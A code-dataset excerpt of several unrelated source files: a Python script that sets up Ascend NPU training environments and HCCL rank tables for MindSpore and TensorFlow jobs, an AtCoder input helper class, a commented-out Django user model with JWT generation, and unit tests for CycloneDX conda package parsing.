] | null | null | null | yaml/init-scripts/setup_npu.py | Asteven-zn/ApulisInstall | a34ca7bbd2ce733014772958c7eac4651c173032 | [
"MIT"
] | 1 | 2022-03-04T07:41:14.000Z | 2022-03-04T07:41:14.000Z | yaml/init-scripts/setup_npu.py | Asteven-zn/ApulisInstall | a34ca7bbd2ce733014772958c7eac4651c173032 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import os
import json
import time
import pdb
import platform
import string
import random
# This script and create_script.sh are maintained by colleagues on the
# algorithm team; update this version number whenever the code changes.
code_version="1.0"
def create_hccl_mindspore():
done = 0
rank_id = 0
hccl_data = {}
# for test only
#os.environ['DLWS_WORKER_NUM'] = "2"
#os.environ['DLWS_JOB_ID'] = "test_npu_device"
#os.environ['DLWS_USER_NAME'] = "bifeng.peng"
#
    ## single-node job; checking DLWS_PS_NUM == 0 would be the most reliable test
if "DLWS_WORKER_NUM" not in os.environ:
os.environ['DLWS_WORKER_NUM'] = "1"
else:
pass
worker_num = int(os.environ['DLWS_WORKER_NUM'])
job_id = os.environ['DLWS_JOB_ID']
user_name = os.environ['DLWS_USER_NAME']
    # 1) the hccl file and the related scripts are all placed in this directory
    # 2) the files are tied to a specific job, so different jobs are stored in isolation
    npu_dir = '/home/%s/.npu/%s/' % (user_name, job_id)
    # the fields below are hard-coded
hccl_data["board_id"] = "0x0020"
hccl_data["chip_info"] = "910"
hccl_data["deploy_mode"] = "lab"
hccl_data["group_count"] = "1"
hccl_data["para_plane_nic_location"] = "device"
hccl_data["para_plane_nic_name"] = [
"eth0",
"eth1",
"eth2",
"eth3",
"eth4",
"eth5",
"eth6",
"eth7"
]
hccl_data["para_plane_nic_num"] = "8"
hccl_data["status"] = "completed"
hccl_data["group_list"] = []
group = {}
group["device_num"] = str(worker_num * 8)
group["server_num"] = str(worker_num)
group["group_name"] = "test"
group["instance_count"] = group["device_num"]
group["instance_list"] = []
    ## process the generated npu_<idx>.info files;
    ## the number of files matches the number of workers
while True:
PATH = npu_dir + ('/npu_%d.info' % (done))
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
with open(PATH, "r") as f:
ips = ""
host_ip = ""
                # format of the file:
# ip=id1:ip1,id2:ip2
# host=xxx
for line in f:
print(line)
if "ip=" in line:
_, ips = line.strip().split("=")
elif "host=" in line:
_, host_ip = line.strip().split("=")
ip_list = ips.split(",")
ip_list = sorted(ip_list)
for ip_elem in ip_list:
                        # device id and device ip
device_id, device_ip = ip_elem.split(":")
## set up group list
device_item = {} # item of instance list
device_item["devices"] = [{
"device_id" : device_id,
"device_ip" : device_ip
}]
device_item["rank_id"] = str(rank_id)
device_item["server_id"] = str(host_ip)
#pdb.set_trace()
rank_id = rank_id + 1
group["instance_list"].append(device_item)
f.close()
done = done + 1
else:
pass
if done == worker_num:
break
else:
pass
time.sleep(1)
group["instance_count"] = group["device_num"] = str(len(group["instance_list"]))
print("succ!")
hccl_data["group_list"].append(group)
# dump to json file
with open(npu_dir + '/hccl_ms.json', 'w') as fp:
json.dump(hccl_data, fp)
return
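The per-worker `npu_<idx>.info` format parsed above (`ip=id1:ip1,id2:ip2` plus `host=...`) can be exercised in isolation; this hypothetical helper mirrors the parsing loop, with made-up sample addresses:

```python
def parse_npu_info(text):
    """Parse one npu_<idx>.info blob into (host_ip, [(device_id, device_ip), ...])."""
    ips, host_ip = "", ""
    for line in text.splitlines():
        if "ip=" in line and "host=" not in line:
            _, ips = line.strip().split("=")
        elif "host=" in line:
            _, host_ip = line.strip().split("=")
    # sort the "id:ip" entries so devices come out ordered by device id
    devices = [tuple(elem.split(":")) for elem in sorted(ips.split(","))]
    return host_ip, devices

host, devices = parse_npu_info("ip=1:192.0.2.11,0:192.0.2.10\nhost=10.0.0.5")
print(host)     # host IP from the host= line
print(devices)  # device (id, ip) pairs, sorted by id
```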
def create_hccl_tensorflow():
    done = 0  # number of worker nodes processed so far
    rank_id = 0  # equals the device count
    hccl_data = {}
    # for test only
    # os.environ['DLWS_WORKER_NUM'] = "2"
    # os.environ['DLWS_JOB_ID'] = "test_npu_device"
    # os.environ['DLWS_USER_NAME'] = "bifeng.peng"
    ## non-distributed job
    if "DLWS_WORKER_NUM" not in os.environ:
        os.environ['DLWS_WORKER_NUM'] = "1"
    worker_num = int(os.environ['DLWS_WORKER_NUM'])
    job_id = os.environ['DLWS_JOB_ID']
    pod_name = os.environ['POD_NAME']
    user_name = os.environ['DLWS_USER_NAME']
    distributing_job = False
    if "DLWS_NUM_PS" in os.environ:
        if int(os.environ["DLWS_NUM_PS"]) > 0:
            distributing_job = True
    # 1) The hccl file and related scripts live in this directory.
    # 2) The files are job-specific, so each job gets its own directory.
    npu_dir = '/home/%s/.npu/%s/' % (user_name, job_id)
    hccl_data["group_count"] = "1"
    hccl_data["status"] = "completed"
    hccl_data["group_list"] = []
    group = {}
    #group["device_count"] = worker_num * 8
    group["instance_count"] = str(worker_num)
    group["group_name"] = "test"
    group["instance_list"] = []
    ## Read the generated npu_<idx>.info files;
    ## there is exactly one file per worker.
    while True:
        PATH = npu_dir + ('/npu_%d.info' % done)
        if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
            with open(PATH, "r") as f:
                ips = ""
                host_ip = ""
                # File format:
                # ip=id1:ip1,id2:ip2
                # host=xxx
                for line in f:
                    print(line)
                    if "ip=" in line:
                        _, ips = line.strip().split("=")
                    elif "host=" in line:
                        _, host_ip = line.strip().split("=")
                instance_item = {}  # item of the instance list
                if distributing_job:
                    instance_item["pod_name"] = job_id + "-worker-" + str(done)
                else:
                    instance_item["pod_name"] = pod_name
                instance_item["server_id"] = host_ip
                instance_item["devices"] = []
                # parse the string to get all device ips
                ip_list = sorted(ips.split(","))
                for ip_elem in ip_list:
                    # one device
                    device_id, device_ip = ip_elem.split(":")
                    ## set up the group list
                    device_item = {
                        "device_id": device_id,
                        "device_ip": device_ip
                    }
                    # append to the instance list
                    rank_id = rank_id + 1
                    instance_item["devices"].append(device_item)
                group["instance_list"].append(instance_item)
            done = done + 1
        if done == worker_num:
            break
        time.sleep(1)
    group["device_count"] = str(rank_id)
    group["instance_count"] = str(len(group["instance_list"]))
    hccl_data["group_list"].append(group)
    print("succ!")
    # dump to a json file
    with open(npu_dir + '/hccl_tf.json', 'w') as fp:
        json.dump(hccl_data, fp)
    return
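For reference, here is a hedged sketch of the rank-table shape the function writes to hccl_tf.json. All concrete values (pod name, server id, device ips) are hypothetical stand-ins, not output captured from a real job:

```python
import json

# hypothetical rank table for one worker with two NPU devices
hccl_data = {
    "group_count": "1",
    "status": "completed",
    "group_list": [{
        "group_name": "test",
        "device_count": "2",
        "instance_count": "1",
        "instance_list": [{
            "pod_name": "job-0",
            "server_id": "10.0.0.7",
            "devices": [
                {"device_id": "0", "device_ip": "192.168.100.100"},
                {"device_id": "1", "device_ip": "192.168.100.101"},
            ],
        }],
    }],
}
# round-trip through json to confirm the structure serialises cleanly
parsed = json.loads(json.dumps(hccl_data))
print(parsed["group_list"][0]["device_count"])
```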
# Load environment variables from /pod.env
def load_env(file_path):
    envs = {}
    with open(file_path, "r") as f:
        for line in f:
            line = line.strip()
            # strip the "export" keyword as a prefix; note that
            # lstrip("export") would wrongly strip any of those characters
            if line.startswith("export"):
                line = line[len("export"):].strip()
            if line != "" and "=" in line:
                # split only on the first '=' so values containing '=' survive
                key, value = line.split("=", 1)
                envs[key] = value
    return envs
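A stand-alone sketch of the /pod.env round trip: write "export KEY=VALUE" lines, then parse them back, splitting only on the first '=' so values that themselves contain '=' stay intact. The file lives in a temporary directory and the sample values are hypothetical:

```python
import os
import tempfile

path = os.path.join(tempfile.mkdtemp(), "pod.env")
with open(path, "w") as f:
    f.write("export DEVICE_ID=0\n")
    f.write("export LAUNCH=train.py --epochs=10\n")  # value contains '='

envs = {}
with open(path) as f:
    for line in f:
        line = line.strip()
        if line.startswith("export"):
            line = line[len("export"):].strip()
        if line and "=" in line:
            key, value = line.split("=", 1)  # maxsplit=1 keeps the full value
            envs[key] = value
print(envs)
```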
# Write environment variables to /pod.env.
# If a key already exists, its value is overwritten.
def add_env(path, envs):
    # Overwrite entries with the same key; other existing keys are kept.
    envs_orig = load_env(path)
    for k, v in envs.items():
        envs_orig[k] = v
    with open(path, "w") as f:
        for k, v in envs_orig.items():
            f.write("export %s=%s\n" % (k, v))
    return
def get_os_flag():
    osflag = "x86_64"
    if platform.machine() == "aarch64":
        osflag = "arm64"
    return osflag

# The GNU install directory uses a different architecture name
# than the compute components, so handle it separately.
def get_gnu_arch_flag():
    osflag = "x86_64"
    if platform.machine() == "aarch64":
        osflag = "aarch64"
    return osflag

def get_random_num(length):
    return ''.join(random.choice(string.digits) for _ in range(length))
# Append a snippet to the given user's shell startup file
# so that the environment updates in /pod.env are sourced on login.
def set_bashrc(username):
    if username == "root":
        path = "/root/.bashrc"
    else:
        path = "/home/" + username + "/.bashrc"
    with open(path, "a") as f:
        cmd = '''
if [ -f "/pod.env" ]; then
    . /pod.env
fi
'''
        f.write(cmd + "\n")
    return
# Prepare the MindSpore environment:
# 1) prepare environment variables and write them to /pod.env
# 2) create the training shell script required by the algorithm
# 3) create the hccl file required by the algorithm
def handle_mindspore():
    path = "/pod.env"
    envs = load_env(path)  # load the variables created during platform bootstrap
    envs_to_add = {}
    envs_to_add["DEVICE_ID"] = "0"
    # Parse the GPU/NPU device IDs
    if "VISIBLE_IDS" in envs:
        envs["VISIBLE_IDS"] = envs["VISIBLE_IDS"].replace("\\", "")
        envs_to_add["VISIBLE_IDS"] = envs["VISIBLE_IDS"]
    # Parse the NPU device IPs
    if "NPU_IPS" in envs:
        envs["NPU_IPS"] = envs["NPU_IPS"].replace("\\", "")
        envs_to_add["NPU_IPS"] = envs["NPU_IPS"]
    ## Merge the variables already present in /pod.env with the
    ## current process environment; the merged result lives in envs.
    for k, v in os.environ.items():
        if k not in envs:
            envs[k] = v
    ## The device id does not need to be parsed here.
    ## Set the random parameter required by the algorithm.
    envs["RANDOM"] = get_random_num(6)
    envs["osflag"] = get_os_flag()
    envs["gnu_arch"] = get_gnu_arch_flag()
    # MindSpore environment variable templates
    mindspore_envs = [
        "PYTHONPATH=/usr/local/lib/python3.7/site-packages/mindspore/lib:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/opp/op_impl/built-in/ai_core/tbe:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/pyACL/python/site-packages/acl:${PYTHONPATH}",
        "LD_LIBRARY_PATH=/usr/lib/${gnu_arch}-linux-gnu/hdf5/serial:/usr/local/Ascend/add-ons/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/fwkacllib/lib64:/usr/local/Ascend/add-ons:/home/HwHiAiUser/Ascend/nnae/latest/fwkacllib/lib64:/usr/local/Ascend/driver/lib64/common/:/usr/local/Ascend/driver/lib64/driver/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/opp/op_impl/built-in/ai_core/tbe/op_tiling:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/atc/lib64:/usr/local/Ascend/fwkacllib/lib64/:/usr/local/lib/python3.7/site-packages/mindspore/lib/:/usr/local/lib/python3.7/site-packages/torch/lib:/usr/local/lib:/home/clang+llvm/lib/:$LD_LIBRARY_PATH",
        "TBE_IMPL_PATH=/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/opp/op_impl/built-in/ai_core/tbe:/usr/local/Ascend/ascend-toolkit/latest/opp/op_impl/built-in/ai_core/tbe",
        "PATH=$PATH:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/fwkacllib/ccec_compiler/bin/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/fwkacllib/ccec_compiler/bin/:/home/clang+llvm/bin/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/atc/bin",
        "ASCEND_OPP_PATH=/home/HwHiAiUser/Ascend/ascend-toolkit/latest/opp",
        "LLVM_CONFIG=/home/clang+llvm/bin/llvm-config",
        "SOC_VERSION=Ascend910",
        "POD_NAME=${DLWS_JOB_ID}",
        "JOB_ID=${RANDOM}",
        "RANK_SIZE=1",
        "ASCEND_GLOBAL_LOG_LEVEL=3",
        "ASCEND_GLOBAL_EVENT_ENABLE=0"
    ]
    # Render the templates
    for item in mindspore_envs:
        tpl = string.Template(item)
        new_item = tpl.safe_substitute(envs)
        if "=" in new_item:
            # split on the first '=' only, so PATH-like values stay intact
            k, v = new_item.strip().split("=", 1)
            envs_to_add[k] = v
    # 1) Update /pod.env with the new variables
    add_env(path, envs_to_add)
    # 2) Generate the training shell script
    pod_cmd = os.environ["DLWS_LAUNCH_CMD"]
    npu_info_dir = "/home/" + os.environ["DLWS_USER_NAME"] + "/.npu/" + os.environ["DLWS_JOB_ID"] + "/train.sh"
    cmd = 'python /pod/scripts/create_script.py --type mindspore --command "%s" --out %s' % (pod_cmd, npu_info_dir)
    os.system(cmd)
    os.system("chmod 777 " + npu_info_dir)
    # Propagate the environment updates to root's shell startup file
    set_bashrc("root")
    ## 3) Generate hccl_ms.json
    if need_create_hccl():
        create_hccl_mindspore()
    # 4) For distributed jobs, synchronise environment setup across pods
    if is_distributed_job() and is_ps_pod():
        notify()
    elif is_distributed_job() and is_worker_pod():
        wait()
    return
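The template rendering relies on string.Template.safe_substitute, which fills known ${NAME} placeholders and leaves unknown ones untouched instead of raising KeyError. A small demonstration with hypothetical values standing in for the merged /pod.env and os.environ mapping:

```python
from string import Template

envs = {"osflag": "arm64", "DLWS_JOB_ID": "job-42"}  # hypothetical values
tpl = Template("POD_NAME=${DLWS_JOB_ID};TBE=${osflag}-linux;KEEP=${UNSET}")
rendered = tpl.safe_substitute(envs)
# ${UNSET} is not in the mapping, so safe_substitute keeps it verbatim
print(rendered)
```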
# Prepare the TensorFlow environment:
# 1) prepare environment variables and write them to /pod.env
# 2) create the training shell script required by the algorithm
# 3) create the hccl file required by the algorithm
def handle_tensorflow():
    # 1) Prepare environment variables and write them to /pod.env
    path = "/pod.env"
    envs = load_env(path)  # load the variables created during platform bootstrap
    envs_to_add = {}
    # Parse the GPU/NPU device IDs
    if "VISIBLE_IDS" in envs:
        envs["VISIBLE_IDS"] = envs["VISIBLE_IDS"].replace("\\", "")
        envs_to_add["VISIBLE_IDS"] = envs["VISIBLE_IDS"]
    if "NPU_IPS" in envs:
        envs["NPU_IPS"] = envs["NPU_IPS"].replace("\\", "")
        envs_to_add["NPU_IPS"] = envs["NPU_IPS"]
    ## Merge the variables already present in /pod.env with the
    ## current process environment; the merged result lives in envs.
    for k, v in os.environ.items():
        if k not in envs:
            envs[k] = v
    ## Use the first device id
    device_id = "0"
    device_index = "0"
    if "VISIBLE_IDS" in envs:
        devid = envs["VISIBLE_IDS"].split(",")[0].strip()
        if len(devid) > 0:
            device_id = devid
    device_index = device_id
    ## Set the random parameter
    envs["RANDOM"] = get_random_num(6)
    envs["osflag"] = get_os_flag()
    envs["gnu_arch"] = get_gnu_arch_flag()
    # TensorFlow environment variable templates
    tensorflow_envs = [
        "PYTHONPATH=/usr/local/lib/python3.7/site-packages/mindspore/lib:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/opp/op_impl/built-in/ai_core/tbe:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/pyACL/python/site-packages/acl:${PYTHONPATH}",
        "LD_LIBRARY_PATH=/usr/lib/${gnu_arch}-linux-gnu/hdf5/serial:/usr/local/Ascend/add-ons/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/fwkacllib/lib64:/usr/local/Ascend/add-ons:/home/HwHiAiUser/Ascend/nnae/latest/fwkacllib/lib64:/usr/local/Ascend/driver/lib64/common/:/usr/local/Ascend/driver/lib64/driver/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/opp/op_impl/built-in/ai_core/tbe/op_tiling:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/atc/lib64:/usr/local/Ascend/fwkacllib/lib64/:/usr/local/lib/python3.7/site-packages/mindspore/lib/:/usr/local/lib/python3.7/site-packages/torch/lib:/usr/local/lib:/home/clang+llvm/lib/:$LD_LIBRARY_PATH",
        "TBE_IMPL_PATH=/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/opp/op_impl/built-in/ai_core/tbe:/usr/local/Ascend/ascend-toolkit/latest/opp/op_impl/built-in/ai_core/tbe",
        "PATH=$PATH:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/${osflag}-linux/fwkacllib/ccec_compiler/bin/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/fwkacllib/ccec_compiler/bin/:/home/clang+llvm/bin/:/home/HwHiAiUser/Ascend/ascend-toolkit/latest/atc/bin",
        "ASCEND_OPP_PATH=/home/HwHiAiUser/Ascend/ascend-toolkit/latest/opp",
        "LLVM_CONFIG=/home/clang+llvm/bin/llvm-config",
        "SOC_VERSION=Ascend910",
        "POD_NAME=${DLWS_JOB_ID}",
        "JOB_ID=${RANDOM}",
        "RANK_SIZE=1",
        "ASCEND_GLOBAL_LOG_LEVEL=3",
        "ASCEND_GLOBAL_EVENT_ENABLE=0"
    ]
    envs_to_add["DEVICE_ID"] = device_id
    envs_to_add["DEVICE_INDEX"] = device_index
    # Render the templates
    for item in tensorflow_envs:
        tpl = string.Template(item)
        new_item = tpl.safe_substitute(envs)
        if "=" in new_item:
            # split on the first '=' only, so PATH-like values stay intact
            k, v = new_item.strip().split("=", 1)
            envs_to_add[k] = v
    # 1) Update the environment variables
    add_env(path, envs_to_add)
    ## 2) Generate the training shell script
    pod_cmd = os.environ["DLWS_LAUNCH_CMD"]
    npu_info_dir = "/home/" + os.environ["DLWS_USER_NAME"] + "/.npu/" + os.environ["DLWS_JOB_ID"] + "/train.sh"
    cmd = 'python /pod/scripts/create_script.py --type tensorflow --command "%s" --out %s' % (pod_cmd, npu_info_dir)
    print(cmd, "==========================")
    os.system(cmd)
    os.system("chmod 777 " + npu_info_dir)
    # Update the user's bash startup script
    set_bashrc("root")
    # 3) Generate hccl_tf.json
    if need_create_hccl():
        create_hccl_tensorflow()
    # 4) For distributed jobs, synchronise environment setup across pods
    if is_distributed_job() and is_ps_pod():
        notify()
    elif is_distributed_job() and is_worker_pod():
        wait()
    return
# Is this a distributed training job?
def is_distributed_job():
    if "DLWS_NUM_PS" in os.environ:
        dlws_num_ps = os.environ["DLWS_NUM_PS"].strip().lower()
        if len(dlws_num_ps) > 0 and int(dlws_num_ps) > 0:
            print("is_distributed_job return true")
            return True
    return False

# Is this the master (ps) node?
def is_ps_pod():
    if "DLWS_ROLE_NAME" in os.environ:
        dlws_role_name = os.environ["DLWS_ROLE_NAME"].strip().lower()
        ## "ps" marks the ps pod of a multi-node multi-device job
        if dlws_role_name == "ps":
            return True
    return False

# Is this a worker node?
def is_worker_pod():
    if "DLWS_ROLE_NAME" in os.environ:
        dlws_role_name = os.environ["DLWS_ROLE_NAME"].strip().lower()
        if dlws_role_name == "worker":
            return True
    return False

# For distributed training jobs, the ps node creates the
# setup_environment_done file once environment preparation
# has finished; the file marks completion.
def notify():
    # A single-node job has only one pod, so no coordination is needed.
    if is_distributed_job() is False:
        return
    setup_environment_done = "/home/" + os.environ["DLWS_USER_NAME"] + "/.npu/" + os.environ["DLWS_JOB_ID"] + "/setup_environment_done"
    # In multi-node multi-device training the ps node prepares the environment.
    if not os.path.exists(setup_environment_done):
        open(setup_environment_done, 'a').close()
    return

# For distributed training jobs, worker nodes poll for the
# setup_environment_done file to learn when environment
# preparation has finished.
def wait():
    # A single-node job has only one pod, so there is nothing to wait for.
    if is_distributed_job() is False:
        return
    setup_environment_done = "/home/" + os.environ["DLWS_USER_NAME"] + "/.npu/" + os.environ["DLWS_JOB_ID"] + "/setup_environment_done"
    # In multi-node multi-device training the ps node prepares the environment.
    while True:
        if not os.path.exists(setup_environment_done):
            print("===========", setup_environment_done, " not found. wait")
            time.sleep(1)
        else:
            break
    return

# 1) In single-node training the hccl file must be created.
# 2) In multi-node multi-device training the ps pod creates the hccl
#    file, which is then read by all worker pods.
def need_create_hccl():
    if "DLWS_ROLE_NAME" in os.environ:
        dlws_role_name = os.environ["DLWS_ROLE_NAME"].strip().lower()
        ## "master" marks a single-node pod;
        ## "ps" marks the ps pod of a multi-node multi-device job.
        if dlws_role_name == "ps" or dlws_role_name == "master":
            return True
    return False
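The notify()/wait() pair above implements a simple file-based barrier. Here is a minimal self-contained sketch of the same idea, using a temporary directory instead of the job's .npu path and a bounded poll so it cannot hang:

```python
import os
import tempfile
import time

done_flag = os.path.join(tempfile.mkdtemp(), "setup_environment_done")

def notify_once(path):
    # ps side: create the marker file exactly once
    if not os.path.exists(path):
        open(path, "a").close()

def wait_for(path, timeout=5.0, poll=0.05):
    # worker side: poll until the marker appears (timeout added for safety)
    deadline = time.time() + timeout
    while not os.path.exists(path):
        if time.time() > deadline:
            raise RuntimeError("timed out waiting for %s" % path)
        time.sleep(poll)

notify_once(done_flag)
wait_for(done_flag)
barrier_ok = os.path.exists(done_flag)
print(barrier_ok)
```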
if __name__ == "__main__":
    # 1) The training framework type is passed in from the frontend.
    #    Based on this field the script creates framework-specific
    #    environment artifacts: hccl files, environment variables, etc.
    # 2) The script is invoked by the platform's bootstrap.sh and runs
    #    only on single-node jobs or on the PS node of distributed jobs.
    if "aiframework" in os.environ:
        framework = os.environ["aiframework"].strip().lower()
        if framework == "tensorflow":
            handle_tensorflow()
        elif framework == "mindspore":
            handle_mindspore()
        else:
            handle_tensorflow()
    else:
        # backwards compatibility with versions < v1.3.0
        create_hccl_mindspore()
        create_hccl_tensorflow()
# ======================================================================
# File: src/atcoderbase.py
# Repo: scnsh/python-circlci-test (license: Apache-2.0)
# ======================================================================
from collections import deque
from typing import List


class AtCoderBase:
    def __init__(self, all_input: List[str]):
        self.all_input = deque(all_input)
        self.ret_str = ""
        self.msg = list()

    def input(self):
        def _input() -> str:
            line = self.all_input.pop()
            yield line
        return _input().__next__()

    def print(self, data):
        self.msg.append(str(data))

    def process(self):
        raise NotImplementedError
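A stand-alone illustration of the buffering idea behind AtCoderBase: input lines live in a deque and printed output is collected into a list for later comparison in tests. One caveat worth noting: deque.pop() takes from the right, so the class as written hands back the last line first (callers presumably pass input in reverse, or popleft() may have been intended):

```python
from collections import deque

lines = deque(["3", "1 2 3"])
consumed = lines.pop()  # pop() takes from the RIGHT, i.e. the LAST line
msg = []
msg.append(str(consumed))
print(msg)
```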
# ======================================================================
# File: appSchool/models.py
# Repo: NandyAkash/Sma (license: MIT)
# ======================================================================
# import jwt
# from datetime import datetime, timedelta
# from django.conf import settings
# from django.contrib.auth.models import (
#     AbstractBaseUser, BaseUserManager, PermissionsMixin
# )
# from django.db import models
# # Create your models here.
# class UserManager(BaseUserManager):
#     """
#     Django requires that custom users define their own Manager class. By
#     inheriting from `BaseUserManager`, we get a lot of the same code used by
#     Django to create a `User`.
#     All we have to do is override the `create_user` function which we will use
#     to create `User` objects.
#     """
#     def create_user(self, username, password=None):
#         """Create and return a `User` with an role, username and password."""
#         if username is None:
#             raise TypeError('Users must have a username.')
#         # if roles is None:
#         #     raise TypeError('Users must have a role.')
#         user = self.model(username=username)
#         user.set_password(password)
#         user.save()
#         return user
#     def create_superuser(self, username, password):
#         """
#         Create and return a `User` with superuser (admin) permissions.
#         """
#         if password is None:
#             raise TypeError('Superusers must have a password.')
#         user = self.create_user(username, password)
#         user.is_superuser = True
#         user.is_staff = True
#         user.save()
#         return user
# class Role(models.Model):
#     '''
#     The Role entries are managed by the system,
#     automatically created via a Django data migration.
#     '''
#     TEACHER = 2
#     ADMIN = 1
#     ROLE_CHOICES = (
#         (TEACHER, 'teacher'),
#         (ADMIN, 'admin'),
#     )
#     id = models.PositiveSmallIntegerField(choices=ROLE_CHOICES, primary_key=True)
#     def __str__(self):
#         return self.get_id_display()
# class User(AbstractBaseUser, PermissionsMixin):
#     # Each `User` needs a human-readable unique identifier that we can use to
#     # represent the `User` in the UI. We want to index this column in the
#     # database to improve lookup performance.
#     username = models.CharField(db_index=True, max_length=255, unique=True)
#     # We also need a way to contact the user and a way for the user to identify
#     # themselves when logging in. Since we need an email address for contacting
#     # the user anyways, we will also use the email for logging in because it is
#     # the most common form of login credential at the time of writing.
#     roles = models.ManyToManyField(Role)
#     # When a user no longer wishes to use our platform, they may try to delete
#     # their account. That's a problem for us because the data we collect is
#     # valuable to us and we don't want to delete it. We
#     # will simply offer users a way to deactivate their account instead of
#     # letting them delete it. That way they won't show up on the site anymore,
#     # but we can still analyze the data.
#     is_active = models.BooleanField(default=True)
#     # The `is_staff` flag is expected by Django to determine who can and cannot
#     # log into the Django admin site. For most users this flag will always be
#     # false.
#     is_staff = models.BooleanField(default=False)
#     # A timestamp representing when this object was created.
#     created_at = models.DateTimeField(auto_now_add=True)
#     # A timestamp representing when this object was last updated.
#     updated_at = models.DateTimeField(auto_now=True)
#     # More fields required by Django when specifying a custom user model.
#     # The `USERNAME_FIELD` property tells us which field we will use to log in.
#     # In this case we want it to be the username field.
#     USERNAME_FIELD = 'username'
#     # Tells Django that the UserManager class defined above should manage
#     # objects of this type.
#     objects = UserManager()
#     def __str__(self):
#         """
#         Returns a string representation of this `User`.
#         This string is used when a `User` is printed in the console.
#         """
#         return self.roles
#     @property
#     def token(self):
#         """
#         Allows us to get a user's token by calling `user.token` instead of
#         `user.generate_jwt_token().
#         The `@property` decorator above makes this possible. `token` is called
#         a "dynamic property".
#         """
#         return self._generate_jwt_token()
#     def get_full_name(self):
#         """
#         This method is required by Django for things like handling emails.
#         Typically this would be the user's first and last name. Since we do
#         not store the user's real name, we return their username instead.
#         """
#         return self.username
#     def _generate_jwt_token(self):
#         """
#         Generates a JSON Web Token that stores this user's ID and has an expiry
#         date set to 60 days into the future.
#         """
#         dt = datetime.now() + timedelta(days=60)
#         token = jwt.encode({
#             'id': self.pk,
#             'exp': int(dt.strftime('%s'))
#         }, settings.SECRET_KEY, algorithm='HS256')
#         return token.decode('utf-8')
# ======================================================================
# File: tests/test_utils_conda.py
# Repo: woodruffw-forks/cyclonedx-python-lib (license: Apache-2.0)
# ======================================================================
# encoding: utf-8
# This file is part of CycloneDX Python Lib
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
# Copyright (c) OWASP Foundation. All Rights Reserved.
from unittest import TestCase

from cyclonedx.utils.conda import parse_conda_json_to_conda_package, parse_conda_list_str_to_conda_package, CondaPackage


class TestUtilsConda(TestCase):

    def test_parse_conda_json_no_hash(self) -> None:
        cp: CondaPackage = parse_conda_json_to_conda_package(
            conda_json_str='{"base_url": "https://repo.anaconda.com/pkgs/main","build_number": 1003,"build_string": '
                           '"py39hecd8cb5_1003","channel": "pkgs/main","dist_name": "chardet-4.0.0-py39hecd8cb5_1003",'
                           '"name": "chardet","platform": "osx-64","version": "4.0.0"}'
        )
        self.assertIsInstance(cp, dict)
        self.assertEqual(cp['base_url'], 'https://repo.anaconda.com/pkgs/main')
        self.assertEqual(cp['build_number'], 1003)
        self.assertEqual(cp['build_string'], 'py39hecd8cb5_1003')
        self.assertEqual(cp['channel'], 'pkgs/main')
        self.assertEqual(cp['dist_name'], 'chardet-4.0.0-py39hecd8cb5_1003')
        self.assertEqual(cp['name'], 'chardet')
        self.assertEqual(cp['platform'], 'osx-64')
        self.assertEqual(cp['version'], '4.0.0')
        self.assertIsNone(cp['md5_hash'])

    def test_parse_conda_list_str_no_hash(self) -> None:
        cp: CondaPackage = parse_conda_list_str_to_conda_package(
            conda_list_str='https://repo.anaconda.com/pkgs/main/osx-64/chardet-4.0.0-py39hecd8cb5_1003.conda'
        )
        self.assertIsInstance(cp, dict)
        self.assertEqual(cp['base_url'], 'https://repo.anaconda.com/pkgs/main')
        self.assertEqual(cp['build_number'], 1003)
        self.assertEqual(cp['build_string'], 'py39hecd8cb5_1003')
        self.assertEqual(cp['channel'], 'pkgs/main')
        self.assertEqual(cp['dist_name'], 'chardet-4.0.0-py39hecd8cb5_1003')
        self.assertEqual(cp['name'], 'chardet')
        self.assertEqual(cp['platform'], 'osx-64')
        self.assertEqual(cp['version'], '4.0.0')
        self.assertIsNone(cp['md5_hash'])

    def test_parse_conda_list_str_with_hash_1(self) -> None:
        cp: CondaPackage = parse_conda_list_str_to_conda_package(
            conda_list_str='https://repo.anaconda.com/pkgs/main/noarch/tzdata-2021a-h52ac0ba_0.conda'
                           '#d42e4db918af84a470286e4c300604a3'
        )
        self.assertIsInstance(cp, dict)
        self.assertEqual(cp['base_url'], 'https://repo.anaconda.com/pkgs/main')
        self.assertEqual(cp['build_number'], 0)
        self.assertEqual(cp['build_string'], 'h52ac0ba_0')
        self.assertEqual(cp['channel'], 'pkgs/main')
        self.assertEqual(cp['dist_name'], 'tzdata-2021a-h52ac0ba_0')
        self.assertEqual(cp['name'], 'tzdata')
        self.assertEqual(cp['platform'], 'noarch')
        self.assertEqual(cp['version'], '2021a')
        self.assertEqual(cp['md5_hash'], 'd42e4db918af84a470286e4c300604a3')

    def test_parse_conda_list_str_with_hash_2(self) -> None:
        cp: CondaPackage = parse_conda_list_str_to_conda_package(
            conda_list_str='https://repo.anaconda.com/pkgs/main/osx-64/ca-certificates-2021.7.5-hecd8cb5_1.conda'
                           '#c2d0ae65c08dacdcf86770b7b5bbb187'
        )
        self.assertIsInstance(cp, dict)
